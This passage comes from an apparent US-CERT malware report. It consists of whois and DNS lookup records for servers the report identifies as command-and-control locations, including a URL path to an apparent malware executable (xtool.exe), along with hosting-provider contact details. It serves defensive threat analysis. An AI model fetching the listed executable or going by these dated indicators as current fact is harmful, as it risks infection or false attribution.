2011-03-01T10:48:14Z
last-modified: 2015-11-29T21:16:15Z
source:
RIPE
person:
Sedinkin Alexander
address:
Ukraine, Boyarka, Belogorodskaya str., 11a
phone:
+380 44 222-9-888 ext. 213
address:
UKRAINE
nic-hdl:
SA7501-RIPE
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:36:18Z
last-modified: 2015-11-29T21:15:42Z
source:
RIPE
% Information related to '176.114.0.0/22AS56485'
route:
176.114.0.0/22
descr:
FOP Sedinkin Olexandr Valeriyovuch
origin:
AS56485
mnt-by:
THEHOST-MNT
created:
2014-04-26T22:55:50Z
last-modified: 2014-04-26T22:58:13Z
source:
RIPE
% This query was served by the RIPE Database Query Service version 1.88 (ANGUS)
DNS records
DNS query for 120.0.114.176.in-addr.arpa failed: TimedOut
name
class
type data time to live
editprod.waterfilter.in.ua IN A
176.114.0.120 3600s
(01:00:00)
waterfilter.in.ua
IN MX
preference:
exchange:
mail.waterfilter.in.ua
3600s
(01:00:00)
waterfilter.in.ua
IN TXT v=spf1 ip4:176.114.0.120 a mx ~all3600s
waterfilter.in.ua
IN NS ns2.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN A
176.114.0.120 3600s
(01:00:00)
waterfilter.in.ua
IN SOA
server: ns1.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2015031414
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 86400
US-CERT MIFR-10105049-Update2
(01:00:00)
45 of 63
3600s
(01:00:00)
waterfilter.in.ua
IN NS ns1.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN MX
preference:
exchange:
mail.waterfilter.in.ua
3600s
(01:00:00)
waterfilter.in.ua
IN NS ns3.thehost.com.ua 3600s
(01:00:00)
120.0.114.176.in-addr.arpa IN PTR s12.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2014044192
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 86400
3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s
(01:00:00)
Relationships
(D) editprod.waterfilter.in.ua
Characterized_By
(W) Address lookup
(D) editprod.waterfilter.in.ua
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) editprod.waterfilter.in.ua
Related_To
(P) 80
(D) editprod.waterfilter.in.ua
Related_To
(I) 176.114.0.120
Description
Identified Command and Control Location.
mymodule.waterfilter.in.ua/system/logs/xtool.exe
Ports
Whois
Address lookup
canonical name
mymodule.waterfilter.in.ua.
aliases
addresses
176.114.0.157
Domain Whois record
Queried whois.ua with "waterfilter.in.ua"...
% request from 209.200.105.145
% This is the Ukrainian Whois query server #F.
% The Whois is subject to Terms of use
% See https[:]//hostmaster.ua/services/
% The object shown below is NOT in the UANIC database.
% It has been obtained by querying a remote server:
% (whois.in.ua) at port 43.
% REDIRECT BEGIN
% In.UA whois server. (whois.in.ua)
% All questions regarding this service please send to help@whois.in.ua
% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua
domain:
waterfilter.in.ua
descr:
waterfilter.in.ua
admin-c: THST-UANIC
tech-c:
THST-UANIC
status:
OK-UNTIL 20170310000000
nserver: ns1.thehost.com.ua
nserver: ns2.thehost.com.ua
nserver: ns3.thehost.com.ua
mnt-by:
THEHOST-MNT-INUA
mnt-lower: THEHOST-MNT-INUA
changed: hostmaster@thehost.com.ua 20160224094245
US-CERT MIFR-10105049-Update2
46 of 63
source:
INUA
% REDIRECT END
Network Whois record
Queried whois.ripe.net with "-B 176.114.0.157"...
% Information related to '176.114.0.0 - 176.114.15.255'
% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua'
inetnum:
176.114.0.0 - 176.114.15.255
netname:
THEHOST-NETWORK-3
country:
org:
ORG-FSOV1-RIPE
admin-c:
SA7501-RIPE
tech-c:
SA7501-RIPE
status:
ASSIGNED PI
mnt-by:
RIPE-NCC-END-MNT
mnt-by:
THEHOST-MNT
mnt-routes: THEHOST-MNT
mnt-domains: THEHOST-MNT
created:
2012-04-10T13:34:51Z
last-modified: 2016-04-14T10:45:42Z
source:
RIPE
sponsoring-org: ORG-NL64-RIPE
organisation: ORG-FSOV1-RIPE
org-name:
FOP Sedinkin Olexandr Valeriyovuch
org-type:
other
address:
08154, Ukraine, Boyarka, Belogorodskaya str., 11a
e-mail:
info@thehost.ua
abuse-c:
AR19055-RIPE
abuse-mailbox: abuse@thehost.ua
remarks:
----------------------------------------------------remarks:
Hosting Provider TheHost
remarks:
----------------------------------------------------remarks:
For abuse/spam issues contact abuse@thehost.ua
remarks:
For general/sales questions contact info@thehost.ua
remarks:
For technical support contact support@thehost.ua
remarks:
----------------------------------------------------phone:
+380 44 222-9-888
phone:
+7 499 403-36-28
fax-no:
+380 44 222-9-888 ext. 4
admin-c:
SA7501-RIPE
mnt-ref:
THEHOST-MNT
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:48:14Z
last-modified: 2015-11-29T21:16:15Z
source:
RIPE
person:
Sedinkin Alexander
address:
Ukraine, Boyarka, Belogorodskaya str., 11a
phone:
+380 44 222-9-888 ext. 213
address:
UKRAINE
nic-hdl:
SA7501-RIPE
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:36:18Z
last-modified: 2015-11-29T21:15:42Z
source:
RIPE
% Information related to '176.114.0.0/22AS56485'
route:
176.114.0.0/22
descr:
FOP Sedinkin Olexandr Valeriyovuch
origin:
AS56485
mnt-by:
THEHOST-MNT
created:
2014-04-26T22:55:50Z
last-modified: 2014-04-26T22:58:13Z
source:
RIPE
% This query was served by the RIPE Database Query Service version 1.88 (HEREFORD)
DNS records
DNS query for 157.0.114.176.in-addr.arpa failed: TimedOut
name
class
type data time to live
mymodule.waterfilter.in.ua
IN A
176.114.0.157 3600s
waterfilter.in.ua
IN SOA
server: ns1.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2015031414
US-CERT MIFR-10105049-Update2
(01:00:00)
47 of 63
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 86400
3600s
(01:00:00)
waterfilter.in.ua
IN NS ns2.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN MX
preference:
exchange:
mail.waterfilter.in.ua
3600s
(01:00:00)
waterfilter.in.ua
IN TXT v=spf1 ip4:176.114.0.120 a mx ~all3600s
(01:00:00)
waterfilter.in.ua
IN NS ns3.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN MX
preference:
exchange:
mail.waterfilter.in.ua
3600s
(01:00:00)
waterfilter.in.ua
IN A
176.114.0.120 3600s
(01:00:00)
waterfilter.in.ua
IN NS ns1.thehost.com.ua 3600s
(01:00:00)
157.0.114.176.in-addr.arpa IN PTR waterfilter.in.ua
3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2014044197
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 86400
3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s
(01:00:00)
-- end -Relationships
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Related_To
(P) 80
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Characterized_By
(W) Address lookup
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Connected_From
9f918fb741e951a10e68ce6874b839aef5a26d604
86db31e509f8dcaa13acec5 (617ba)
(D) mymodule.waterfilter.in.ua/system
/logs/xtool.exe
Related_To
(I) 176.114.0.157
Description
Identified Command and Control Location.
204.12.12.40
private.directinvesting.com
Whois
Address lookup
lookup failed 204.12.12.40
Could not find a domain name corresponding to this IP address.
Domain Whois record
Don't have a domain name for which to get a record
Network Whois record
Queried whois.arin.net with "n ! NET-204-12-12-32-1"...
NetRange:
204.12.12.32 - 204.12.12.63
CIDR:
204.12.12.32/27
NetName:
THEMONEYPAPERINC
NetHandle:
NET-204-12-12-32-1
US-CERT MIFR-10105049-Update2
48 of 63
Parent:
HOSTMYSITE (NET-204-12-0-0-1)
NetType:
Reassigned
OriginAS:
AS20021
Customer:
THE MONEYPAPER INC. (C02687180)
RegDate:
2011-02-03
Updated:
2011-02-03
Ref:
https[:]//whois.arin.net/rest/net/NET-204-12-12-32-1
CustName:
THE MONEYPAPER INC.
Address:
555 THEODORE FREMD AVENUE SUITE B-103
City:
StateProv:
PostalCode: 10580
Country:
RegDate:
2011-02-03
Updated:
2011-03-19
Ref:
https[:]//whois.arin.net/rest/customer/C02687180
OrgNOCHandle: IPADM271-ARIN
OrgNOCName: IP Admin
OrgNOCPhone: +1-302-731-4948
OrgNOCEmail: ipadmin@hostmysite.com
OrgNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
OrgTechHandle: IPADM271-ARIN
OrgTechName: IP Admin
OrgTechPhone: +1-302-731-4948
OrgTechEmail: ipadmin@hostmysite.com
OrgTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
OrgAbuseHandle: ABUSE1072-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-302-731-4948
OrgAbuseEmail: abuse@hostmysite.com
OrgAbuseRef: https[:]//whois.arin.net/rest/poc/ABUSE1072-ARIN
RNOCHandle: IPADM271-ARIN
RNOCName: IP Admin
RNOCPhone: +1-302-731-4948
RNOCEmail: ipadmin@hostmysite.com
RNOCRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
RTechHandle: IPADM271-ARIN
RTechName: IP Admin
RTechPhone: +1-302-731-4948
RTechEmail: ipadmin@hostmysite.com
RTechRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
RAbuseHandle: IPADM271-ARIN
RAbuseName: IP Admin
RAbusePhone: +1-302-731-4948
RAbuseEmail: ipadmin@hostmysite.com
RAbuseRef: https[:]//whois.arin.net/rest/poc/IPADM271-ARIN
DNS records
DNS query for 40.12.12.204.in-addr.arpa returned an error from the server: NameError
Relationships
(I) 204.12.12.40
Characterized_By
(W) Address lookup
(I) 204.12.12.40
Related_To
(D) private.directinvesting.com
209.236.67.159
cderlearn.com
Whois
Address lookup
canonical name
dl-573-57.slc.westdc.net.
aliases
addresses
209.236.67.159
Domain Whois record
Queried whois.internic.net with "dom westdc.net"...
Domain Name: WESTDC.NET
Registrar: ENOM, INC.
Sponsoring Registrar IANA ID: 48
Whois Server: whois.enom.com
US-CERT MIFR-10105049-Update2
49 of 63
Referral URL: http[:]//www[.]enom.com
Name Server: NS1.WESTDC.NET
Name Server: NS2.WESTDC.NET
Name Server: NS3.WESTDC.NET
Status: clientTransferProhibited https[:]//icann.org/epp#clientTransferProh bited
Updated Date: 09-dec-2015
Creation Date: 09-sep-2008
Expiration Date: 09-sep-2019
>>> Last update of whois database: Sun, 15 Jan 2017 23:13:20 GMT <<<
Queried whois.enom.com with "westdc.net"...
Domain Name: WESTDC.NET
Registry Domain ID: 1518630589_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: www[.]enom.com
Updated Date: 2015-07-14T14:07:24.00Z
Creation Date: 2008-09-09T19:31:20.00Z
Registrar Registration Expiration Date: 2019-09-09T19:31:00.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Domain Status: clientTransferProhibited https[:]//www[.]icann.org/epp#clientTransferProh bited
Registry Registrant ID:
Registrant Name: TECHNICAL SUPPORT
Registrant Organization: UK2 GROUP
Registrant Street: 517 WEST 100 NORTH, SUITE #225
Registrant City: PROVIDENCE
Registrant State/Province: UT
Registrant Postal Code: 84332
Registrant Country: US
Registrant Phone: +1.4357553433
Registrant Phone Ext:
Registrant Fax: +1.4357553449
Registrant Fax Ext:
Registrant Email: DOMAINMASTER@UK2GROUP.COM
Registry Admin ID:
Admin Name: TECHNICAL SUPPORT
Admin Organization: UK2 GROUP
Admin Street: 517 WEST 100 NORTH, SUITE #225
Admin City: PROVIDENCE
Admin State/Province: UT
Admin Postal Code: 84332
Admin Country: US
Admin Phone: +1.4357553433
Admin Phone Ext:
Admin Fax: +1.4357553449
Admin Fax Ext:
Admin Email: DOMAINMASTER@UK2GROUP.COM
Registry Tech ID:
Tech Name: TECHNICAL SUPPORT
Tech Organization: UK2 GROUP
Tech Street: 517 WEST 100 NORTH, SUITE #225
Tech City: PROVIDENCE
Tech State/Province: UT
Tech Postal Code: 84332
Tech Country: US
Tech Phone: +1.4357553433
Tech Phone Ext:
Tech Fax: +1.4357553449
Tech Fax Ext:
Tech Email: DOMAINMASTER@UK2GROUP.COM
Name Server: NS1.WESTDC.NET
Name Server: NS2.WESTDC.NET
Name Server: NS3.WESTDC.NET
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252982646
URL of the ICANN WHOIS Data Problem Reporting System: http[:]//wdprs.internic.net/
>>> Last update of WHOIS database: 2015-07-14T14:07:24.00Z <<<
Network Whois record
Queried secure.mpcustomer.com with "209.236.67.159"...
Queried whois.arin.net with "n 209.236.67.159"...
US-CERT MIFR-10105049-Update2
50 of 63
NetRange:
209.236.64.0 - 209.236.79.255
CIDR:
209.236.64.0/20
NetName:
WH-NET-209-236-64-0-1
NetHandle:
NET-209-236-64-0-1
Parent:
NET209 (NET-209-0-0-0-0)
NetType:
Direct Allocation
OriginAS:
AS29854
Organization: WestHost, Inc. (WESTHO)
RegDate:
2010-02-25
Updated:
2014-01-02
Ref:
https[:]//whois.arin.net/rest/net/NET-209-236-64-0-1
OrgName:
WestHost, Inc.
OrgId:
WESTHO
Address:
517 W 100 N STE 225
City:
Providence
StateProv:
PostalCode: 84332
Country:
RegDate:
2000-03-13
Updated:
2016-09-30
Comment:
Please report abuse issues to abuse@uk2group.com
Ref:
https[:]//whois.arin.net/rest/org/WESTHO
ReferralServer: rwhois://secure.mpcustomer.com:4321
OrgNOCHandle: NOC12189-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-435-755-3433
OrgNOCEmail: noc@uk2group.com
OrgNOCRef: https[:]//whois.arin.net/rest/poc/NOC12189-ARIN
OrgTechHandle: WESTH1-ARIN
OrgTechName: WestHost Inc
OrgTechPhone: +1-435-755-3433
OrgTechEmail: noc@uk2group.com
OrgTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN
OrgAbuseHandle: WESTH2-ARIN
OrgAbuseName: WestHost Abuse
OrgAbusePhone: +1-435-755-3433
OrgAbuseEmail: abuse@uk2group.com
OrgAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN
RTechHandle: WESTH1-ARIN
RTechName: WestHost Inc
RTechPhone: +1-435-755-3433
RTechEmail: noc@uk2group.com
RTechRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN
RNOCHandle: WESTH1-ARIN
RNOCName: WestHost Inc
RNOCPhone: +1-435-755-3433
RNOCEmail: noc@uk2group.com
RNOCRef: https[:]//whois.arin.net/rest/poc/WESTH1-ARIN
RAbuseHandle: WESTH2-ARIN
RAbuseName: WestHost Abuse
RAbusePhone: +1-435-755-3433
RAbuseEmail: abuse@uk2group.com
RAbuseRef: https[:]//whois.arin.net/rest/poc/WESTH2-ARIN
DNS records
name
class
type data time to live
dl-573-57.slc.westdc.net IN A
209.236.67.216
westdc.net
IN SOA
server: ns1.westdc.net
email:
hostmaster@westdc.net
serial:
2016018517
refresh: 28800
retry:
7200
expire: 604800
minimum ttl: 600
86400s (1.00:00:00)
westdc.net
IN MX
preference:
exchange:
mail.westdc.net
86400s (1.00:00:00)
westdc.net
IN NS ns2.westdc.net
86400s
westdc.net
IN NS ns3.westdc.net
86400s
US-CERT MIFR-10105049-Update2
86400s
(1.00:00:00)
(1.00:00:00)
(1.00:00:00)
51 of 63
westdc.net
IN NS ns1.westdc.net
86400s (1.00:00:00)
159.67.236.209.in-addr.arpa IN PTR dl-573-57.slc.westdc.net 86400s (1.00:00:00)
67.236.209.in-addr.arpa IN SOA
server: ns1.westdc.net
email:
hostmaster@westdc.net
serial:
2010074157
refresh: 28800
retry:
7200
expire: 604800
minimum ttl: 600
86400s (1.00:00:00)
67.236.209.in-addr.arpa IN NS ns3.westdc.net
86400s (1.00:00:00)
67.236.209.in-addr.arpa IN NS ns1.westdc.net
86400s (1.00:00:00)
67.236.209.in-addr.arpa IN NS ns2.westdc.net
86400s (1.00:00:00)
Relationships
(I) 209.236.67.159
Characterized_By
(W) Address lookup
(I) 209.236.67.159
Related_To
(D) cderlearn.com
146.185.161.126
insta.reduct.ru
Whois
Address lookup
lookup failed 146.185.161.126
Could not find a domain name corresponding to this IP address.
Domain Whois record
Don't have a domain name for which to get a record
Network Whois record
Queried whois.ripe.net with "-B 146.185.161.126"...
% Information related to '146.185.160.0 - 146.185.167.255'
% Abuse contact for '146.185.160.0 - 146.185.167.255' is 'abuse@digitalocean.com'
inetnum:
146.185.160.0 - 146.185.167.255
netname:
DIGITALOCEAN-AMS-3
descr:
Digital Ocean, Inc.
country:
admin-c:
PT7353-RIPE
tech-c:
PT7353-RIPE
status:
ASSIGNED PA
mnt-by:
digitalocean
mnt-lower:
digitalocean
mnt-routes: digitalocean
created:
2013-09-17T17:13:25Z
last-modified: 2015-11-20T14:45:22Z
source:
RIPE
person:
Network Operations
address:
101 Ave of the Americas, 10th Floor, New York, NY 10013
phone:
+13478756044
nic-hdl:
PT7353-RIPE
mnt-by:
digitalocean
created:
2015-03-11T16:37:07Z
last-modified: 2015-11-19T15:57:21Z
source:
RIPE
e-mail:
noc@digitalocean.com
org:
ORG-DOI2-RIPE
% This query was served by the RIPE Database Query Service version 1.88 (WAGYU)
DNS records
DNS query for 126.161.185.146.in-addr.arpa returned an error from the server: NameError
No records to display
Relationships
(I) 146.185.161.126
Characterized_By
(W) Address lookup
(I) 146.185.161.126
Related_To
(D) insta.reduct.ru
176.114.0.120
US-CERT MIFR-10105049-Update2
52 of 63
editprod.waterfilter.in.ua
Whois
Address lookup
canonical name
s12.thehost.com.ua.
aliases
addresses
176.114.0.120
Domain Whois record
Queried whois.ua with "thehost.com.ua"...
% request from 209.200.90.218
% This is the Ukrainian Whois query server #I.
% The Whois is subject to Terms of use
% See https[:]//hostmaster.ua/services/
domain:
thehost.com.ua
dom-public:
registrant:
thehost
admin-c:
thehost
tech-c:
thehost
mnt-by:
ua.thehost
nserver:
ns4.thehost.com.ua
nserver:
ns3.thehost.com.ua
nserver:
ns2.thehost.com.ua
nserver:
ns1.thehost.com.ua
status:
clientDeleteProhibited
status:
clientTransferProhibited
created:
2007-10-25 15:16:15+03
modified:
2015-09-09 01:35:49+03
expires:
2020-10-25 15:16:15+02
source:
UAEPP
% Glue Records:
% =============
nserver:
ns2.thehost.com.ua
ip-address:
91.109.22.38
nserver:
ns4.thehost.com.ua
ip-address:
192.162.240.116
nserver:
ns1.thehost.com.ua
ip-address:
91.223.180.14
nserver:
ns3.thehost.com.ua
ip-address:
176.111.63.45
% Registrar:
% ==========
registrar:
ua.thehost
organization: SE Sedinkin Aleksandr Valerievich
organization-loc:
url:
http[:]//thehost.com.ua
city:
Boyarka
country:
source:
UAEPP
% Registrant:
% ===========
contact-id:
thehost
person:
Hosting provider TheHost
person-loc:
TheHost
e-mail:
hostmaster@thehost.com.ua
address:
Belogorodskaya str., 11a
address:
Kyiv region
address:
Boyarka
postal-code:
08154
country:
address-loc:
, 11
address-loc:
address-loc:
postal-code-loc: 08154
country-loc:
phone:
+380.442229888
fax:
+380.672366930
mnt-by:
ua.thehost
status:
linked
US-CERT MIFR-10105049-Update2
53 of 63
status:
clientDeleteProhibited
status:
clientTransferProhibited
status:
clientUpdateProhibited
created:
2012-11-22 23:02:17+02
modified:
2015-11-30 00:57:34+02
source:
UAEPP
% Administrative Contacts:
% =======================
contact-id:
thehost
person:
Hosting provider TheHost
person-loc:
TheHost
e-mail:
hostmaster@thehost.com.ua
address:
Belogorodskaya str., 11a
address:
Kyiv region
address:
Boyarka
postal-code:
08154
country:
address-loc:
, 11
address-loc:
address-loc:
postal-code-loc: 08154
country-loc:
phone:
+380.442229888
fax:
+380.672366930
mnt-by:
ua.thehost
status:
linked
status:
clientDeleteProhibited
status:
clientTransferProhibited
status:
clientUpdateProhibited
created:
2012-11-22 23:02:17+02
modified:
2015-11-30 00:57:34+02
source:
UAEPP
% Technical Contacts:
% ===================
contact-id:
thehost
person:
Hosting provider TheHost
person-loc:
TheHost
e-mail:
hostmaster@thehost.com.ua
address:
Belogorodskaya str., 11a
address:
Kyiv region
address:
Boyarka
postal-code:
08154
country:
address-loc:
, 11
address-loc:
address-loc:
postal-code-loc: 08154
country-loc:
phone:
+380.442229888
fax:
+380.672366930
mnt-by:
ua.thehost
status:
linked
status:
clientDeleteProhibited
status:
clientTransferProhibited
status:
clientUpdateProhibited
created:
2012-11-22 23:02:17+02
modified:
2015-11-30 00:57:34+02
source:
UAEPP
% Query time: 6 msec
Network Whois record
Queried whois.ripe.net with "-B 176.114.0.120"...
% Information related to '176.114.0.0 - 176.114.15.255'
% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua'
inetnum:
176.114.0.0 - 176.114.15.255
netname:
THEHOST-NETWORK-3
country:
org:
ORG-FSOV1-RIPE
admin-c:
SA7501-RIPE
tech-c:
SA7501-RIPE
status:
ASSIGNED PI
mnt-by:
RIPE-NCC-END-MNT
US-CERT MIFR-10105049-Update2
54 of 63
mnt-by:
THEHOST-MNT
mnt-routes: THEHOST-MNT
mnt-domains: THEHOST-MNT
created:
2012-04-10T13:34:51Z
last-modified: 2016-04-14T10:45:42Z
source:
RIPE
sponsoring-org: ORG-NL64-RIPE
organisation: ORG-FSOV1-RIPE
org-name:
FOP Sedinkin Olexandr Valeriyovuch
org-type:
other
address:
08154, Ukraine, Boyarka, Belogorodskaya str., 11a
e-mail:
info@thehost.ua
abuse-c:
AR19055-RIPE
abuse-mailbox: abuse@thehost.ua
remarks:
----------------------------------------------------remarks:
Hosting Provider TheHost
remarks:
----------------------------------------------------remarks:
For abuse/spam issues contact abuse@thehost.ua
remarks:
For general/sales questions contact info@thehost.ua
remarks:
For technical support contact support@thehost.ua
remarks:
----------------------------------------------------phone:
+380 44 222-9-888
phone:
+7 499 403-36-28
fax-no:
+380 44 222-9-888 ext. 4
admin-c:
SA7501-RIPE
mnt-ref:
THEHOST-MNT
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:48:14Z
last-modified: 2015-11-29T21:16:15Z
source:
RIPE
person:
Sedinkin Alexander
address:
Ukraine, Boyarka, Belogorodskaya str., 11a
phone:
+380 44 222-9-888 ext. 213
address:
UKRAINE
nic-hdl:
SA7501-RIPE
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:36:18Z
last-modified: 2015-11-29T21:15:42Z
source:
RIPE
% Information related to '176.114.0.0/22AS56485'
route:
176.114.0.0/22
descr:
FOP Sedinkin Olexandr Valeriyovuch
origin:
AS56485
mnt-by:
THEHOST-MNT
created:
2014-04-26T22:55:50Z
last-modified: 2014-04-26T22:58:13Z
source:
RIPE
% This query was served by the RIPE Database Query Service version 1.88 (ANGUS)
DNS records
DNS query for 120.0.114.176.in-addr.arpa failed: TimedOut
name
class
type data time to live
s12.thehost.com.ua IN A
176.114.0.120 3600s
(01:00:00)
thehost.com.ua
IN SOA
server: ns1.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2012093399
refresh: 10800
retry:
3600
expire: 6048000
minimum ttl: 86400
3600s
(01:00:00)
thehost.com.ua
IN NS ns3.thehost.com.ua 86400s (1.00:00:00)
thehost.com.ua
IN A
91.234.33.3 3600s
(01:00:00)
thehost.com.ua
IN TXT yandex-verification: 7984d982d76e47fa 3600s
thehost.com.ua
IN MX
preference:
exchange:
aspmx2.googlemail.com
3600s
(01:00:00)
thehost.com.ua
IN MX
preference:
exchange:
alt2.aspmx.l.google.com
US-CERT MIFR-10105049-Update2
(01:00:00)
55 of 63
3600s
(01:00:00)
thehost.com.ua
IN NS ns4.thehost.com.ua 86400s (1.00:00:00)
thehost.com.ua
IN TXT v=spf1 ip4:91.234.32.9 ip4:91.234.35.135 ip4:91.234.35.9 include:_spf.google.com ~all
thehost.com.ua
IN MX
preference:
exchange:
aspmx3.googlemail.com
3600s
(01:00:00)
thehost.com.ua
IN NS ns1.thehost.com.ua 86400s (1.00:00:00)
thehost.com.ua
IN MX
preference:
exchange:
aspmx5.googlemail.com
3600s
(01:00:00)
thehost.com.ua
IN MX
preference:
exchange:
alt1.aspmx.l.google.com
3600s
(01:00:00)
thehost.com.ua
IN NS ns2.thehost.com.ua 86400s (1.00:00:00)
thehost.com.ua
IN MX
preference:
exchange:
aspmx4.googlemail.com
3600s
(01:00:00)
thehost.com.ua
IN MX
preference:
exchange:
aspmx.l.google.com
3600s
(01:00:00)
120.0.114.176.in-addr.arpa IN PTR s12.thehost.com.ua 3557s
(00:59:17)
0.114.176.in-addr.arpa IN NS ns4.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns3.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns1.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN NS ns2.thehost.com.ua 3600s
(01:00:00)
0.114.176.in-addr.arpa IN SOA
server: noc.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2014044192
refresh: 10800
retry:
3600
expire: 604800
minimum ttl: 86400
3600s
(01:00:00)
3600s
(01:00:00)
Relationships
(I) 176.114.0.120
Characterized_By
(W) Address lookup
(I) 176.114.0.120
Related_To
(D) editprod.waterfilter.in.ua
176.114.0.157
mymodule.waterfilter.in.ua/system/logs/xtool.exe
Whois
Address lookup
canonical name
waterfilter.in.ua.
aliases
addresses
176.114.0.157
Domain Whois record
Queried whois.ua with "waterfilter.in.ua"...
% request from 209.200.105.145
% This is the Ukrainian Whois query server #F.
% The Whois is subject to Terms of use
% See https[:]//hostmaster.ua/services/
% The object shown below is NOT in the UANIC database.
% It has been obtained by querying a remote server:
% (whois.in.ua) at port 43.
% REDIRECT BEGIN
% In.UA whois server. (whois.in.ua)
US-CERT MIFR-10105049-Update2
56 of 63
% All questions regarding this service please send to help@whois.in.ua
% To search for domains and In.UA maintainers using the web, visit http[:]//whois.in.ua
domain:
waterfilter.in.ua
descr:
waterfilter.in.ua
admin-c: THST-UANIC
tech-c:
THST-UANIC
status:
OK-UNTIL 20170310000000
nserver: ns1.thehost.com.ua
nserver: ns2.thehost.com.ua
nserver: ns3.thehost.com.ua
mnt-by:
THEHOST-MNT-INUA
mnt-lower: THEHOST-MNT-INUA
changed: hostmaster@thehost.com.ua 20160224094245
source:
INUA
% REDIRECT END
Network Whois record
Queried whois.ripe.net with "-B 176.114.0.157"...
% Information related to '176.114.0.0 - 176.114.15.255'
% Abuse contact for '176.114.0.0 - 176.114.15.255' is 'abuse@thehost.ua'
inetnum:
176.114.0.0 - 176.114.15.255
netname:
THEHOST-NETWORK-3
country:
org:
ORG-FSOV1-RIPE
admin-c:
SA7501-RIPE
tech-c:
SA7501-RIPE
status:
ASSIGNED PI
mnt-by:
RIPE-NCC-END-MNT
mnt-by:
THEHOST-MNT
mnt-routes: THEHOST-MNT
mnt-domains: THEHOST-MNT
created:
2012-04-10T13:34:51Z
last-modified: 2016-04-14T10:45:42Z
source:
RIPE
sponsoring-org: ORG-NL64-RIPE
organisation: ORG-FSOV1-RIPE
org-name:
FOP Sedinkin Olexandr Valeriyovuch
org-type:
other
address:
08154, Ukraine, Boyarka, Belogorodskaya str., 11a
e-mail:
info@thehost.ua
abuse-c:
AR19055-RIPE
abuse-mailbox: abuse@thehost.ua
remarks:
----------------------------------------------------remarks:
Hosting Provider TheHost
remarks:
----------------------------------------------------remarks:
For abuse/spam issues contact abuse@thehost.ua
remarks:
For general/sales questions contact info@thehost.ua
remarks:
For technical support contact support@thehost.ua
remarks:
----------------------------------------------------phone:
+380 44 222-9-888
phone:
+7 499 403-36-28
fax-no:
+380 44 222-9-888 ext. 4
admin-c:
SA7501-RIPE
mnt-ref:
THEHOST-MNT
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:48:14Z
last-modified: 2015-11-29T21:16:15Z
source:
RIPE
person:
address:
phone:
address:
nic-hdl:
Sedinkin Alexander
Ukraine, Boyarka, Belogorodskaya str., 11a
+380 44 222-9-888 ext. 213
UKRAINE
SA7501-RIPE
US-CERT MIFR-10105049-Update2
57 of 63
mnt-by:
THEHOST-MNT
created:
2011-03-01T10:36:18Z
last-modified: 2015-11-29T21:15:42Z
source:
RIPE
% Information related to '176.114.0.0/22AS56485'
route:
176.114.0.0/22
descr:
FOP Sedinkin Olexandr Valeriyovuch
origin:
AS56485
mnt-by:
THEHOST-MNT
created:
2014-04-26T22:55:50Z
last-modified: 2014-04-26T22:58:13Z
source:
RIPE
% This query was served by the RIPE Database Query Service version 1.88 (HEREFORD)
DNS records
DNS query for 157.0.114.176.in-addr.arpa failed: TimedOut
name
class
type data time to live
waterfilter.in.ua
IN NS ns3.thehost.com.ua 3600s
(01:00:00)
waterfilter.in.ua
IN SOA
server: ns1.thehost.com.ua
email:
hostmaster@thehost.com.ua
serial:
2015031414
refresh: 10800
retry:
3600
